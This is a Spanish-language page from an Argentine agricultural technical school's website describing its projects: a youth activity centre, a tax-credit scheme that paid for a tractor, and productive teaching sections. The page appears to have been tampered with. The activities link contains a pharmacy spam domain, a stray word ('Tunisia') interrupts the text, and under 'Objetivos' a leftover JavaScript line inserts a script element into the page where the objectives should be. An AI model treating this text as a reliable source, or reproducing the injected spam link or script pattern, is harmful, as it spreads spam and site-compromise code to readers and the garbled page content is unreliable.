I.P.E.A Y M n 221 San Carlos

Proyectos

 

2015

CAJ 2015

 

 

 

2012

CAJ

[ Actividades 2012 – CLICK cialisforsalecanada.com web AQUI ]

El CAJ (Centro de Actividades Juveniles) es una propuesta institucional que tiende a complementar la oferta educativa de la escuela y la formación de los adolescentes, integrando la educación formal y no formal, a partir de la planificación y ejecución de actividades que se actualizan al inicio de cada ciclo lectivo, en función de demandas e intereses planteados por los propios destinatarios del mismo.

 

Crédito Fiscal

Mediante el Régimen de Crédito Fiscal del Ministerio de Trabajo, Empleo y Seguridad Social las empresas pueden financiar proyectos que fortalezcan las competencias laborales de trabajadores ocupados y desocupados. Asimismo, permite a las instituciones de formación profesional la adquisición de equipamiento nuevo y su fortalecimiento institucional. Las empresas participantes reciben certificados de crédito fiscal que podrán ser utilizados para la cancelación de impuestos a las ganancias, ganancia mínima presunta, impuestos internos e impuesto al valor agregado. Se excluyen expresamente las obligaciones de la Seguridad Social. A través del Crédito Fiscal la escuela logró adquirir un tractor PAUNY 0 km Potencia de 120 CV, transmisión 12 velocidades de avance y 12 de retroceso, dirección hidrostática, frenos de disco en baño de aceite, sistema hidráulico, con cabina y neumáticos.

 

Escuelas Técnicas

El I.P.E.A. Y M. Nº 221 “San Carlos” creado por una demanda de la zona Agrícola Ganadera fue vislumbrando la necesidad de otras alternativas de producción y por ello anexó secciones didáctico-productivas buscando el auto financiamiento y el acompañamiento del proceso de enseñanza – aprendizaje con adelantos tecnológicos. Estos espacios permiten que los alumnos no sólo reciban una formación en los valores sociales, sino también prepararlos para una formación Técnico-Agropecuaria, con la finalidad de incentivar micro emprendimientos familiares como recurso económico alternativo de explotaciones pequeñas o subsidiarias. Tunisia . Además contribuirán a mejorar la calidad de la enseñanza. Los alumnos podrán aprovechar los avances tecnológicos para mejorar las técnicas utilizadas para la producción y serán capaces de llevar a cabo procesos productivos acordes a nuestro tiempo y a la región.

 

Objetivos:

 document.currentScript.parentNode.insertBefore(s, document.currentScript);

Copyright 2012 - I.P.E.A y M. nº 211 "San Carlos" - Remigio Garcia 55 - CP 6127 - Jovita - Cba.
Tel: 03385-499201 - [email protected]